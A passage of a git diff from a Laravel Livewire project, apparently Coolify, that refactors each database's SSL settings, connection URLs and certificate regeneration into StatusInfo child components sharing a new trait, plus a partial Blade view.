-            $this->database->enable_ssl = $this->enableSsl;
-            $this->database->ssl_mode = $this->sslMode;
             $this->database->save();
-
-            $this->db_url = $this->database->internal_db_url;
-            $this->db_url_public = $this->database->external_db_url;
         } else {
             $this->name = $this->database->name;
             $this->description = $this->database->description;
@@ -204,10 +153,6 @@ public function syncData(bool $toModel = false)
             $this->publicPortTimeout = $this->database->public_port_timeout;
             $this->isLogDrainEnabled = $this->database->is_log_drain_enabled;
             $this->customDockerRunOptions = $this->database->custom_docker_run_options;
-            $this->enableSsl = $this->database->enable_ssl;
-            $this->sslMode = $this->database->ssl_mode;
-            $this->db_url = $this->database->internal_db_url;
-            $this->db_url_public = $this->database->external_db_url;
         }
     }
 
@@ -246,6 +191,7 @@ public function submit()
             }
             $this->syncData(true);
             $this->dispatch('success', 'Database updated.');
+            $this->dispatch('databaseUpdated');
         } catch (Exception $e) {
             return handleError($e, $this);
         } finally {
@@ -282,6 +228,7 @@ public function instantSave()
                 StopDatabaseProxy::run($this->database);
                 $this->dispatch('success', 'Database is no longer publicly accessible.');
             }
+            $this->dispatch('databaseUpdated');
         } catch (\Throwable $e) {
             $this->isPublic = ! $this->isPublic;
             $this->syncData(true);
@@ -290,68 +237,6 @@ public function instantSave()
         }
     }
 
-    public function updatedSslMode()
-    {
-        $this->instantSaveSSL();
-    }
-
-    public function instantSaveSSL()
-    {
-        try {
-            $this->authorize('update', $this->database);
-
-            $this->syncData(true);
-            $this->dispatch('success', 'SSL configuration updated.');
-        } catch (Exception $e) {
-            return handleError($e, $this);
-        }
-    }
-
-    public function regenerateSslCertificate()
-    {
-        try {
-            $this->authorize('update', $this->database);
-
-            $existingCert = $this->database->sslCertificates()->first();
-
-            if (! $existingCert) {
-                $this->dispatch('error', 'No existing SSL certificate found for this database.');
-
-                return;
-            }
-
-            $caCert = $this->server->sslCertificates()->where('is_ca_certificate', true)->first();
-
-            if (! $caCert) {
-                $this->server->generateCaCertificate();
-                $caCert = $this->server->sslCertificates()->where('is_ca_certificate', true)->first();
-            }
-
-            if (! $caCert) {
-                $this->dispatch('error', 'No CA certificate found for this database. Please generate a CA certificate for this server in the server/advanced page.');
-
-                return;
-            }
-
-            SslHelper::generateSslCertificate(
-                commonName: $existingCert->common_name,
-                subjectAlternativeNames: $existingCert->subject_alternative_names ?? [],
-                resourceType: $existingCert->resource_type,
-                resourceId: $existingCert->resource_id,
-                serverId: $existingCert->server_id,
-                caCert: $caCert->ssl_certificate,
-                caKey: $caCert->ssl_private_key,
-                configurationDir: $existingCert->configuration_dir,
-                mountPath: $existingCert->mount_path,
-                isPemKeyFileRequired: true,
-            );
-
-            $this->dispatch('success', 'SSL certificates have been regenerated. Please restart the database for changes to take effect.');
-        } catch (Exception $e) {
-            return handleError($e, $this);
-        }
-    }
-
     public function refresh(): void
     {
         $this->database->refresh();
diff --git a/app/Livewire/Project/Database/Mongodb/StatusInfo.php b/app/Livewire/Project/Database/Mongodb/StatusInfo.php
new file mode 100644
index 000000000..a92a682c9
--- /dev/null
+++ b/app/Livewire/Project/Database/Mongodb/StatusInfo.php
@@ -0,0 +1,51 @@
+<?php
+
+namespace App\Livewire\Project\Database\Mongodb;
+
+use App\Models\StandaloneMongodb;
+use App\Traits\HasDatabaseStatusInfo;
+use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
+use Livewire\Component;
+
+class StatusInfo extends Component
+{
+    use AuthorizesRequests;
+    use HasDatabaseStatusInfo;
+
+    public StandaloneMongodb $database;
+
+    protected function databaseLabel(): string
+    {
+        return 'Mongo';
+    }
+
+    protected function sslModeOptions(): array
+    {
+        return [
+            'allow' => ['title' => 'Allow insecure connections', 'label' => 'allow (insecure)'],
+            'prefer' => ['title' => 'Prefer secure connections', 'label' => 'prefer (secure)'],
+            'require' => ['title' => 'Require secure connections', 'label' => 'require (secure)'],
+            'verify-full' => ['title' => 'Verify full certificate', 'label' => 'verify-full (secure)'],
+        ];
+    }
+
+    protected function sslModeHelper(): string
+    {
+        return 'Choose the SSL verification mode for MongoDB connections';
+    }
+
+    protected function afterRefresh(): void
+    {
+        $this->sslMode = $this->database->ssl_mode;
+    }
+
+    protected function applyExtraSslAttributes(): void
+    {
+        $this->database->ssl_mode = $this->sslMode;
+    }
+
+    public function updatedSslMode(): void
+    {
+        $this->instantSaveSSL();
+    }
+}
diff --git a/app/Livewire/Project/Database/Mysql/General.php b/app/Livewire/Project/Database/Mysql/General.php
index 6e1e55b3f..6b88d735d 100644
--- a/app/Livewire/Project/Database/Mysql/General.php
+++ b/app/Livewire/Project/Database/Mysql/General.php
@@ -4,14 +4,11 @@
 
 use App\Actions\Database\StartDatabaseProxy;
 use App\Actions\Database\StopDatabaseProxy;
-use App\Helpers\SslHelper;
 use App\Models\Server;
 use App\Models\StandaloneMysql;
 use App\Support\ValidationPatterns;
-use Carbon\Carbon;
 use Exception;
 use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
-use Illuminate\Support\Facades\Auth;
 use Livewire\Component;
 
 class General extends Component
@@ -50,38 +47,6 @@ class General extends Component
 
     public ?string $customDockerRunOptions = null;
 
-    public bool $enableSsl = false;
-
-    public ?string $sslMode = null;
-
-    public ?string $db_url = null;
-
-    public ?string $db_url_public = null;
-
-    public ?Carbon $certificateValidUntil = null;
-
-    public function getListeners()
-    {
-        $userId = Auth::id();
-        $teamId = Auth::user()->currentTeam()->id;
-
-        return [
-            // Broadcasts go to refreshStatus, which only writes display-only properties.
-            // Never wire status broadcasts to a handler that touches text-input properties —
-            // it clobbers in-progress typing every 10s. See coolify#6062 / #6354 / #9695.
-            "echo-private:user.{$userId},DatabaseStatusChanged" => 'refreshStatus',
-            "echo-private:team.{$teamId},ServiceChecked" => 'refreshStatus',
-        ];
-    }
-
-    public function refreshStatus(): void
-    {
-        $this->database->refresh();
-        $this->db_url = $this->database->internal_db_url;
-        $this->db_url_public = $this->database->external_db_url;
-        $this->certificateValidUntil = $this->database->sslCertificates()->first()?->valid_until;
-    }
-
     protected function rules(): array
     {
         return [
@@ -107,8 +72,6 @@ protected function rules(): array
             'publicPortTimeout' => 'nullable|integer|min:1',
             'isLogDrainEnabled' => 'nullable|boolean',
             'customDockerRunOptions' => 'nullable',
-            'enableSsl' => 'boolean',
-            'sslMode' => 'nullable|string|in:PREFERRED,REQUIRED,VERIFY_CA,VERIFY_IDENTITY',
         ];
     }
 
@@ -129,7 +92,6 @@ protected function messages(): array
                 'publicPort.max' => 'The Public Port must not exceed 65535.',
                 'publicPortTimeout.integer' => 'The Public Port Timeout must be an integer.',
                 'publicPortTimeout.min' => 'The Public Port Timeout must be at least 1.',
-                'sslMode.in' => 'The SSL Mode must be one of: PREFERRED, REQUIRED, VERIFY_CA, VERIFY_IDENTITY.',
             ]
         );
     }
@@ -148,8 +110,6 @@ protected function messages(): array
         'publicPort' => 'Public Port',
         'publicPortTimeout' => 'Public Port Timeout',
         'customDockerRunOptions' => 'Custom Docker Run Options',
-        'enableSsl' => 'Enable SSL',
-        'sslMode' => 'SSL Mode',
     ];
 
     public function mount()
@@ -163,12 +123,6 @@ public function mount()
 
                 return;
             }
-
-            $existingCert = $this->database->sslCertificates()->first();
-
-            if ($existingCert) {
-                $this->certificateValidUntil = $existingCert->valid_until;
-            }
         } catch (Exception $e) {
             return handleError($e, $this);
         }
@@ -192,12 +146,7 @@ public function syncData(bool $toModel = false)
             $this->database->public_port_timeout = $this->publicPortTimeout ?: null;
             $this->database->is_log_drain_enabled = $this->isLogDrainEnabled;
             $this->database->custom_docker_run_options = $this->customDockerRunOptions;
-            $this->database->enable_ssl = $this->enableSsl;
-            $this->database->ssl_mode = $this->sslMode;
             $this->database->save();
-
-            $this->db_url = $this->database->internal_db_url;
-            $this->db_url_public = $this->database->external_db_url;
         } else {
             $this->name = $this->database->name;
             $this->description = $this->database->description;
@@ -213,10 +162,6 @@ public function syncData(bool $toModel = false)
             $this->publicPortTimeout = $this->database->public_port_timeout;
             $this->isLogDrainEnabled = $this->database->is_log_drain_enabled;
             $this->customDockerRunOptions = $this->database->custom_docker_run_options;
-            $this->enableSsl = $this->database->enable_ssl;
-            $this->sslMode = $this->database->ssl_mode;
-            $this->db_url = $this->database->internal_db_url;
-            $this->db_url_public = $this->database->external_db_url;
         }
     }
 
@@ -252,6 +197,7 @@ public function submit()
             }
             $this->syncData(true);
             $this->dispatch('success', 'Database updated.');
+            $this->dispatch('databaseUpdated');
         } catch (Exception $e) {
             return handleError($e, $this);
         } finally {
@@ -288,6 +234,7 @@ public function instantSave()
                 StopDatabaseProxy::run($this->database);
                 $this->dispatch('success', 'Database is no longer publicly accessible.');
             }
+            $this->dispatch('databaseUpdated');
         } catch (\Throwable $e) {
             $this->isPublic = ! $this->isPublic;
             $this->syncData(true);
@@ -296,68 +243,6 @@ public function instantSave()
         }
     }
 
-    public function updatedSslMode()
-    {
-        $this->instantSaveSSL();
-    }
-
-    public function instantSaveSSL()
-    {
-        try {
-            $this->authorize('update', $this->database);
-
-            $this->syncData(true);
-            $this->dispatch('success', 'SSL configuration updated.');
-        } catch (Exception $e) {
-            return handleError($e, $this);
-        }
-    }
-
-    public function regenerateSslCertificate()
-    {
-        try {
-            $this->authorize('update', $this->database);
-
-            $existingCert = $this->database->sslCertificates()->first();
-
-            if (! $existingCert) {
-                $this->dispatch('error', 'No existing SSL certificate found for this database.');
-
-                return;
-            }
-
-            $caCert = $this->server->sslCertificates()->where('is_ca_certificate', true)->first();
-
-            if (! $caCert) {
-                $this->server->generateCaCertificate();
-                $caCert = $this->server->sslCertificates()->where('is_ca_certificate', true)->first();
-            }
-
-            if (! $caCert) {
-                $this->dispatch('error', 'No CA certificate found for this database. Please generate a CA certificate for this server in the server/advanced page.');
-
-                return;
-            }
-
-            SslHelper::generateSslCertificate(
-                commonName: $existingCert->common_name,
-                subjectAlternativeNames: $existingCert->subject_alternative_names ?? [],
-                resourceType: $existingCert->resource_type,
-                resourceId: $existingCert->resource_id,
-                serverId: $existingCert->server_id,
-                caCert: $caCert->ssl_certificate,
-                caKey: $caCert->ssl_private_key,
-                configurationDir: $existingCert->configuration_dir,
-                mountPath: $existingCert->mount_path,
-                isPemKeyFileRequired: true,
-            );
-
-            $this->dispatch('success', 'SSL certificates have been regenerated. Please restart the database for changes to take effect.');
-        } catch (Exception $e) {
-            return handleError($e, $this);
-        }
-    }
-
     public function refresh(): void
     {
         $this->database->refresh();
diff --git a/app/Livewire/Project/Database/Mysql/StatusInfo.php b/app/Livewire/Project/Database/Mysql/StatusInfo.php
new file mode 100644
index 000000000..5fbbc1583
--- /dev/null
+++ b/app/Livewire/Project/Database/Mysql/StatusInfo.php
@@ -0,0 +1,51 @@
+<?php
+
+namespace App\Livewire\Project\Database\Mysql;
+
+use App\Models\StandaloneMysql;
+use App\Traits\HasDatabaseStatusInfo;
+use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
+use Livewire\Component;
+
+class StatusInfo extends Component
+{
+    use AuthorizesRequests;
+    use HasDatabaseStatusInfo;
+
+    public StandaloneMysql $database;
+
+    protected function databaseLabel(): string
+    {
+        return 'MySQL';
+    }
+
+    protected function sslModeOptions(): array
+    {
+        return [
+            'PREFERRED' => ['title' => 'Prefer secure connections', 'label' => 'Prefer (secure)'],
+            'REQUIRED' => ['title' => 'Require secure connections', 'label' => 'Require (secure)'],
+            'VERIFY_CA' => ['title' => 'Verify CA certificate', 'label' => 'Verify CA (secure)'],
+            'VERIFY_IDENTITY' => ['title' => 'Verify full certificate', 'label' => 'Verify Full (secure)'],
+        ];
+    }
+
+    protected function sslModeHelper(): string
+    {
+        return 'Choose the SSL verification mode for MySQL connections';
+    }
+
+    protected function afterRefresh(): void
+    {
+        $this->sslMode = $this->database->ssl_mode;
+    }
+
+    protected function applyExtraSslAttributes(): void
+    {
+        $this->database->ssl_mode = $this->sslMode;
+    }
+
+    public function updatedSslMode(): void
+    {
+        $this->instantSaveSSL();
+    }
+}
diff --git a/app/Livewire/Project/Database/Postgresql/General.php b/app/Livewire/Project/Database/Postgresql/General.php
index 1b36ac28a..4e89e8b62 100644
--- a/app/Livewire/Project/Database/Postgresql/General.php
+++ b/app/Livewire/Project/Database/Postgresql/General.php
@@ -4,14 +4,11 @@
 
 use App\Actions\Database\StartDatabaseProxy;
 use App\Actions\Database\StopDatabaseProxy;
-use App\Helpers\SslHelper;
 use App\Models\Server;
 use App\Models\StandalonePostgresql;
 use App\Support\ValidationPatterns;
-use Carbon\Carbon;
 use Exception;
 use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
-use Illuminate\Support\Facades\Auth;
 use Livewire\Component;
 
 class General extends Component
@@ -54,43 +51,14 @@ class General extends Component
 
     public ?string $customDockerRunOptions = null;
 
-    public bool $enableSsl = false;
-
-    public ?string $sslMode = null;
-
     public string $new_filename;
 
     public string $new_content;
 
-    public ?string $db_url = null;
-
-    public ?string $db_url_public = null;
-
-    public ?Carbon $certificateValidUntil = null;
-
-    public function getListeners()
-    {
-        $userId = Auth::id();
-        $teamId = Auth::user()->currentTeam()->id;
-
-        return [
-            // Broadcasts go to refreshStatus, which only writes display-only properties.
-            // Never wire status broadcasts to a handler that touches text-input properties —
-            // it clobbers in-progress typing every 10s. See coolify#6062 / #6354 / #9695.
-            "echo-private:user.{$userId},DatabaseStatusChanged" => 'refreshStatus',
-            "echo-private:team.{$teamId},ServiceChecked" => 'refreshStatus',
-            'save_init_script',
-            'delete_init_script',
-        ];
-    }
-
-    public function refreshStatus(): void
-    {
-        $this->database->refresh();
-        $this->db_url = $this->database->internal_db_url;
-        $this->db_url_public = $this->database->external_db_url;
-        $this->certificateValidUntil = $this->database->sslCertificates()->first()?->valid_until;
-    }
+    protected $listeners = [
+        'save_init_script',
+        'delete_init_script',
+    ];
 
     protected function rules(): array
     {
@@ -117,8 +85,6 @@ protected function rules(): array
             'publicPortTimeout' => 'nullable|integer|min:1',
             'isLogDrainEnabled' => 'nullable|boolean',
             'customDockerRunOptions' => 'nullable',
-            'enableSsl' => 'boolean',
-            'sslMode' => 'nullable|string|in:allow,prefer,require,verify-ca,verify-full',
         ];
     }
 
@@ -138,7 +104,6 @@ protected function messages(): array
                 'publicPort.max' => 'The Public Port must not exceed 65535.',
                 'publicPortTimeout.integer' => 'The Public Port Timeout must be an integer.',
                 'publicPortTimeout.min' => 'The Public Port Timeout must be at least 1.',
-                'sslMode.in' => 'The SSL Mode must be one of: allow, prefer, require, verify-ca, verify-full.',
             ]
         );
     }
@@ -159,8 +124,6 @@ protected function messages(): array
         'publicPort' => 'Public Port',
         'publicPortTimeout' => 'Public Port Timeout',
         'customDockerRunOptions' => 'Custom Docker Run Options',
-        'enableSsl' => 'Enable SSL',
-        'sslMode' => 'SSL Mode',
     ];
 
     public function mount()
@@ -174,12 +137,6 @@ public function mount()
 
                 return;
             }
-
-            $existingCert = $this->database->sslCertificates()->first();
-
-            if ($existingCert) {
-                $this->certificateValidUntil = $existingCert->valid_until;
-            }
         } catch (Exception $e) {
             return handleError($e, $this);
         }
@@ -205,12 +162,7 @@ public function syncData(bool $toModel = false)
             $this->database->public_port_timeout = $this->publicPortTimeout ?: null;
             $this->database->is_log_drain_enabled = $this->isLogDrainEnabled;
             $this->database->custom_docker_run_options = $this->customDockerRunOptions;
-            $this->database->enable_ssl = $this->enableSsl;
-            $this->database->ssl_mode = $this->sslMode;
             $this->database->save();
-
-            $this->db_url = $this->database->internal_db_url;
-            $this->db_url_public = $this->database->external_db_url;
         } else {
             $this->name = $this->database->name;
             $this->description = $this->database->description;
@@ -228,10 +180,6 @@ public function syncData(bool $toModel = false)
             $this->publicPortTimeout = $this->database->public_port_timeout;
             $this->isLogDrainEnabled = $this->database->is_log_drain_enabled;
             $this->customDockerRunOptions = $this->database->custom_docker_run_options;
-            $this->enableSsl = $this->database->enable_ssl;
-            $this->sslMode = $this->database->ssl_mode;
-            $this->db_url = $this->database->internal_db_url;
-            $this->db_url_public = $this->database->external_db_url;
         }
     }
 
@@ -254,68 +202,6 @@ public function instantSaveAdvanced()
         }
     }
 
-    public function updatedSslMode()
-    {
-        $this->instantSaveSSL();
-    }
-
-    public function instantSaveSSL()
-    {
-        try {
-            $this->authorize('update', $this->database);
-
-            $this->syncData(true);
-            $this->dispatch('success', 'SSL configuration updated.');
-        } catch (Exception $e) {
-            return handleError($e, $this);
-        }
-    }
-
-    public function regenerateSslCertificate()
-    {
-        try {
-            $this->authorize('update', $this->database);
-
-            $existingCert = $this->database->sslCertificates()->first();
-
-            if (! $existingCert) {
-                $this->dispatch('error', 'No existing SSL certificate found for this database.');
-
-                return;
-            }
-
-            $caCert = $this->server->sslCertificates()->where('is_ca_certificate', true)->first();
-
-            if (! $caCert) {
-                $this->server->generateCaCertificate();
-                $caCert = $this->server->sslCertificates()->where('is_ca_certificate', true)->first();
-            }
-
-            if (! $caCert) {
-                $this->dispatch('error', 'No CA certificate found for this database. Please generate a CA certificate for this server in the server/advanced page.');
-
-                return;
-            }
-
-            SslHelper::generateSslCertificate(
-                commonName: $existingCert->common_name,
-                subjectAlternativeNames: $existingCert->subject_alternative_names ?? [],
-                resourceType: $existingCert->resource_type,
-                resourceId: $existingCert->resource_id,
-                serverId: $existingCert->server_id,
-                caCert: $caCert->ssl_certificate,
-                caKey: $caCert->ssl_private_key,
-                configurationDir: $existingCert->configuration_dir,
-                mountPath: $existingCert->mount_path,
-                isPemKeyFileRequired: true,
-            );
-
-            $this->dispatch('success', 'SSL certificates have been regenerated. Please restart the database for changes to take effect.');
-        } catch (Exception $e) {
-            return handleError($e, $this);
-        }
-    }
-
     public function instantSave()
     {
         try {
@@ -341,6 +227,7 @@ public function instantSave()
                 StopDatabaseProxy::run($this->database);
                 $this->dispatch('success', 'Database is no longer publicly accessible.');
             }
+            $this->dispatch('databaseUpdated');
         } catch (\Throwable $e) {
             $this->isPublic = ! $this->isPublic;
             $this->syncData(true);
@@ -504,6 +391,7 @@ public function submit()
             }
             $this->syncData(true);
             $this->dispatch('success', 'Database updated.');
+            $this->dispatch('databaseUpdated');
         } catch (Exception $e) {
             return handleError($e, $this);
         } finally {
diff --git a/app/Livewire/Project/Database/Postgresql/StatusInfo.php b/app/Livewire/Project/Database/Postgresql/StatusInfo.php
new file mode 100644
index 000000000..cc27b61bb
--- /dev/null
+++ b/app/Livewire/Project/Database/Postgresql/StatusInfo.php
@@ -0,0 +1,52 @@
+<?php
+
+namespace App\Livewire\Project\Database\Postgresql;
+
+use App\Models\StandalonePostgresql;
+use App\Traits\HasDatabaseStatusInfo;
+use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
+use Livewire\Component;
+
+class StatusInfo extends Component
+{
+    use AuthorizesRequests;
+    use HasDatabaseStatusInfo;
+
+    public StandalonePostgresql $database;
+
+    protected function databaseLabel(): string
+    {
+        return 'Postgres';
+    }
+
+    protected function sslModeOptions(): array
+    {
+        return [
+            'allow' => ['title' => 'Allow insecure connections', 'label' => 'allow (insecure)'],
+            'prefer' => ['title' => 'Prefer secure connections', 'label' => 'prefer (secure)'],
+            'require' => ['title' => 'Require secure connections', 'label' => 'require (secure)'],
+            'verify-ca' => ['title' => 'Verify CA certificate', 'label' => 'verify-ca (secure)'],
+            'verify-full' => ['title' => 'Verify full certificate', 'label' => 'verify-full (secure)'],
+        ];
+    }
+
+    protected function sslModeHelper(): string
+    {
+        return 'Choose the SSL verification mode for PostgreSQL connections';
+    }
+
+    protected function afterRefresh(): void
+    {
+        $this->sslMode = $this->database->ssl_mode;
+    }
+
+    protected function applyExtraSslAttributes(): void
+    {
+        $this->database->ssl_mode = $this->sslMode;
+    }
+
+    public function updatedSslMode(): void
+    {
+        $this->instantSaveSSL();
+    }
+}
diff --git a/app/Livewire/Project/Database/Redis/StatusInfo.php b/app/Livewire/Project/Database/Redis/StatusInfo.php
index 183ed936f..2e784e2c0 100644
--- a/app/Livewire/Project/Database/Redis/StatusInfo.php
+++ b/app/Livewire/Project/Database/Redis/StatusInfo.php
@@ -2,115 +2,20 @@
 
 namespace App\Livewire\Project\Database\Redis;
 
-use App\Helpers\SslHelper;
 use App\Models\StandaloneRedis;
-use Carbon\Carbon;
-use Exception;
+use App\Traits\HasDatabaseStatusInfo;
 use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
-use Illuminate\Support\Facades\Auth;
 use Livewire\Component;
 
 class StatusInfo extends Component
 {
     use AuthorizesRequests;
+    use HasDatabaseStatusInfo;
 
     public StandaloneRedis $database;
 
-    public bool $enableSsl = false;
-
-    public ?Carbon $certificateValidUntil = null;
-
-    public ?string $dbUrl = null;
-
-    public ?string $dbUrlPublic = null;
-
-    public function getListeners()
+    protected function databaseLabel(): string
     {
-        $userId = Auth::id();
-        $teamId = Auth::user()->currentTeam()->id;
-
-        return [
-            "echo-private:user.{$userId},DatabaseStatusChanged" => 'refresh',
-            "echo-private:team.{$teamId},ServiceChecked" => 'refresh',
-            'databaseUpdated' => 'refresh',
-        ];
-    }
-
-    public function mount(): void
-    {
-        $this->refresh();
-    }
-
-    public function refresh(): void
-    {
-        $this->database->refresh();
-        $this->enableSsl = (bool) $this->database->enable_ssl;
-        $this->dbUrl = $this->database->internal_db_url;
-        $this->dbUrlPublic = $this->database->external_db_url;
-        $this->certificateValidUntil = $this->database->sslCertificates()->first()?->valid_until;
-    }
-
-    public function instantSaveSSL(): void
-    {
-        try {
-            $this->authorize('update', $this->database);
-            $this->database->enable_ssl = $this->enableSsl;
-            $this->database->save();
-            $this->dispatch('success', 'SSL configuration updated.');
-        } catch (Exception $e) {
-            handleError($e, $this);
-        }
-    }
-
-    public function regenerateSslCertificate(): void
-    {
-        try {
-            $this->authorize('update', $this->database);
-
-            $existingCert = $this->database->sslCertificates()->first();
-
-            if (! $existingCert) {
-                $this->dispatch('error', 'No existing SSL certificate found for this database.');
-
-                return;
-            }
-
-            $server = $this->database->destination->server;
-            $caCert = $server->sslCertificates()->where('is_ca_certificate', true)->first();
-
-            if (! $caCert) {
-                $server->generateCaCertificate();
-                $caCert = $server->sslCertificates()->where('is_ca_certificate', true)->first();
-            }
-
-            if (! $caCert) {
-                $this->dispatch('error', 'No CA certificate found for this database. Please generate a CA certificate for this server in the server/advanced page.');
-
-                return;
-            }
-
-            SslHelper::generateSslCertificate(
-                commonName: $existingCert->common_name,
-                subjectAlternativeNames: $existingCert->subject_alternative_names ?? [],
-                resourceType: $existingCert->resource_type,
-                resourceId: $existingCert->resource_id,
-                serverId: $existingCert->server_id,
-                caCert: $caCert->ssl_certificate,
-                caKey: $caCert->ssl_private_key,
-                configurationDir: $existingCert->configuration_dir,
-                mountPath: $existingCert->mount_path,
-                isPemKeyFileRequired: true,
-            );
-
-            $this->refresh();
-            $this->dispatch('success', 'SSL certificates regenerated. Restart database to apply changes.');
-        } catch (Exception $e) {
-            handleError($e, $this);
-        }
-    }
-
-    public function render()
-    {
-        return view('livewire.project.database.redis.status-info');
+        return 'Redis';
     }
 }
diff --git a/app/Traits/HasDatabaseStatusInfo.php b/app/Traits/HasDatabaseStatusInfo.php
new file mode 100644
index 000000000..98c939b7e
--- /dev/null
+++ b/app/Traits/HasDatabaseStatusInfo.php
@@ -0,0 +1,164 @@
+<?php
+
+namespace App\Traits;
+
+use App\Helpers\SslHelper;
+use Carbon\Carbon;
+use Exception;
+use Illuminate\Support\Facades\Auth;
+
+/**
+ * Shared behavior for the per-database StatusInfo Livewire siblings.
+ *
+ * Lives on a child Livewire component so status broadcasts never trigger a
+ * roundtrip on the parent form — preserving in-progress typing AND wire:dirty.
+ * See coolify#6062 / #6354 / #9695.
+ *
+ * Consumers must declare a typed `public Model $database` and implement
+ * databaseLabel(). All other hooks have sensible defaults.
+ */
+trait HasDatabaseStatusInfo
+{
+    public ?string $dbUrl = null;
+
+    public ?string $dbUrlPublic = null;
+
+    public bool $enableSsl = false;
+
+    public ?string $sslMode = null;
+
+    public ?Carbon $certificateValidUntil = null;
+
+    abstract protected function databaseLabel(): string;
+
+    protected function supportsSsl(): bool
+    {
+        return true;
+    }
+
+    protected function sslModeOptions(): ?array
+    {
+        return null;
+    }
+
+    protected function sslModeHelper(): ?string
+    {
+        return null;
+    }
+
+    protected function showPublicUrlPlaceholder(): bool
+    {
+        return false;
+    }
+
+    public function getListeners()
+    {
+        $userId = Auth::id();
+        $teamId = Auth::user()->currentTeam()->id;
+
+        return [
+            "echo-private:user.{$userId},DatabaseStatusChanged" => 'refresh',
+            "echo-private:team.{$teamId},ServiceChecked" => 'refresh',
+            'databaseUpdated' => 'refresh',
+        ];
+    }
+
+    public function mount(): void
+    {
+        $this->refresh();
+    }
+
+    public function refresh(): void
+    {
+        $this->database->refresh();
+        $this->dbUrl = $this->database->internal_db_url;
+        $this->dbUrlPublic = $this->database->external_db_url;
+        if ($this->supportsSsl()) {
+            $this->enableSsl = (bool) $this->database->enable_ssl;
+            $this->certificateValidUntil = $this->database->sslCertificates()->first()?->valid_until;
+            $this->afterRefresh();
+        }
+    }
+
+    /**
+     * Hook for subclasses with extra status-derived properties (e.g. sslMode).
+     */
+    protected function afterRefresh(): void {}
+
+    public function instantSaveSSL(): void
+    {
+        try {
+            $this->authorize('update', $this->database);
+            $this->database->enable_ssl = $this->enableSsl;
+            $this->applyExtraSslAttributes();
+            $this->database->save();
+            $this->dispatch('success', 'SSL configuration updated.');
+        } catch (Exception $e) {
+            handleError($e, $this);
+        }
+    }
+
+    /**
+     * Hook for subclasses with additional SSL columns to persist (e.g. ssl_mode).
+     */
+    protected function applyExtraSslAttributes(): void {}
+
+    public function regenerateSslCertificate(): void
+    {
+        try {
+            $this->authorize('update', $this->database);
+
+            $existingCert = $this->database->sslCertificates()->first();
+
+            if (! $existingCert) {
+                $this->dispatch('error', 'No existing SSL certificate found for this database.');
+
+                return;
+            }
+
+            $server = $this->database->destination->server;
+            $caCert = $server->sslCertificates()->where('is_ca_certificate', true)->first();
+
+            if (! $caCert) {
+                $server->generateCaCertificate();
+                $caCert = $server->sslCertificates()->where('is_ca_certificate', true)->first();
+            }
+
+            if (! $caCert) {
+                $this->dispatch('error', 'No CA certificate found for this database. Please generate a CA certificate for this server in the server/advanced page.');
+
+                return;
+            }
+
+            SslHelper::generateSslCertificate(
+                commonName: $existingCert->common_name,
+                subjectAlternativeNames: $existingCert->subject_alternative_names ?? [],
+                resourceType: $existingCert->resource_type,
+                resourceId: $existingCert->resource_id,
+                serverId: $existingCert->server_id,
+                caCert: $caCert->ssl_certificate,
+                caKey: $caCert->ssl_private_key,
+                configurationDir: $existingCert->configuration_dir,
+                mountPath: $existingCert->mount_path,
+                isPemKeyFileRequired: true,
+            );
+
+            $this->refresh();
+            $this->dispatch('success', 'SSL certificates regenerated. Restart database to apply changes.');
+        } catch (Exception $e) {
+            handleError($e, $this);
+        }
+    }
+
+    public function render()
+    {
+        return view('livewire.project.database.status-info', [
+            'label' => $this->databaseLabel(),
+            'supportsSsl' => $this->supportsSsl(),
+            'sslModeOptions' => $this->sslModeOptions(),
+            'sslModeHelper' => $this->sslModeHelper(),
+            'showPublicUrlPlaceholder' => $this->showPublicUrlPlaceholder(),
+            'isExited' => str($this->database->status)->contains('exited'),
+        ]);
+    }
+}
diff --git a/resources/views/components/database-status-info.blade.php b/resources/views/components/database-status-info.blade.php
new file mode 100644
index 000000000..a7c8dade1
--- /dev/null
+++ b/resources/views/components/database-status-info.blade.php
@@ -0,0 +1,94 @@
+@props([
+    'database',
+    'label',
+    'dbUrl' => null,
+    'dbUrlPublic' => null,
+    'supportsSsl' => true,
+    'enableSsl' => false,
+    'sslMode' => null,
+    'sslModeOptions' => null,
+    'sslModeHelper' => null,
+    'certificateValidUntil' => null,
+    'isExited' => false,
+    'showPublicUrlPlaceholder' => false,
+])
+
+@php
+    $urlHelper = 'If you change the user/password/port, this could be different. This is with the default values.';
+@endphp
+
+<div class="flex flex-col gap-2">
+    <x-forms.input :label="$label . ' URL (internal)'" :helper="$urlHelper" type="password" readonly
+        wire:model="dbUrl" canGate="update" :canResource="$database" />
+    @if ($dbUrlPublic)
+        <x-forms.input :label="$label . ' URL (public)'" :helper="$urlHelper" type="password" readonly
+            wire:model="dbUrlPublic" canGate="update" :canResource="$database" />
+    @elseif ($showPublicUrlPlaceholder)
+        <x-forms.input :label="$label . ' URL (public)'" :helper="$urlHelper" readonly
+            value="Starting the database will generate this." canGate="update" :canResource="$database" />
+    @endif
+
+    @if ($supportsSsl)
+        <div class="flex flex-col gap-2 pt-4">
+            <div class="flex items-center justify-between py-2">
+                <div class="flex items-center justify-between w-full">
+                    <h3>SSL Configuration</h3>
+                    @if ($enableSsl && $certificateValidUntil)
+                        <x-modal-confirmation title="Regenerate SSL Certificates"
+                            buttonTitle="Regenerate SSL Certificates" :actions="[
+                                'The SSL certificate of this database will be regenerated.',
+                                'You must restart the database after regenerating the certificate to start using the new certificate.',
+                            ]"
+                            submitAction="regenerateSslCertificate" :confirmWithText="false" :confirmWithPassword="false" />
+                    @endif
+                </div>
+            </div>
+            @if ($enableSsl && $certificateValidUntil)
+                <span class="text-sm">Valid until:
+                    @if (now()->gt($certificateValidUntil))
+                        <span class="text-red-500">{{ $certificateValidUntil->format('d.m.Y H:i:s') }} - Expired</span>
+                    @elseif(now()->addDays(30)->gt($certificateValidUntil))
+                        <span class="text-red-500">{{ $certificateValidUntil->format('d.m.Y H:i:s') }} - Expiring
+                            soon</span>
+                    @else
+                        <span>{{ $certificateValidUntil->format('d.m.Y H:i:s') }}</span>
+                    @endif
+                </span>
+            @endif
+            <div class="flex flex-col gap-2">
+                <div class="w-64" wire:key="enable_ssl">
+                    @if ($isExited)
+                        <x-forms.checkbox id="enableSsl" label="Enable SSL" wire:model.live="enableSsl"
+                            instantSave="instantSaveSSL" canGate="update" :canResource="$database" />
+                    @else
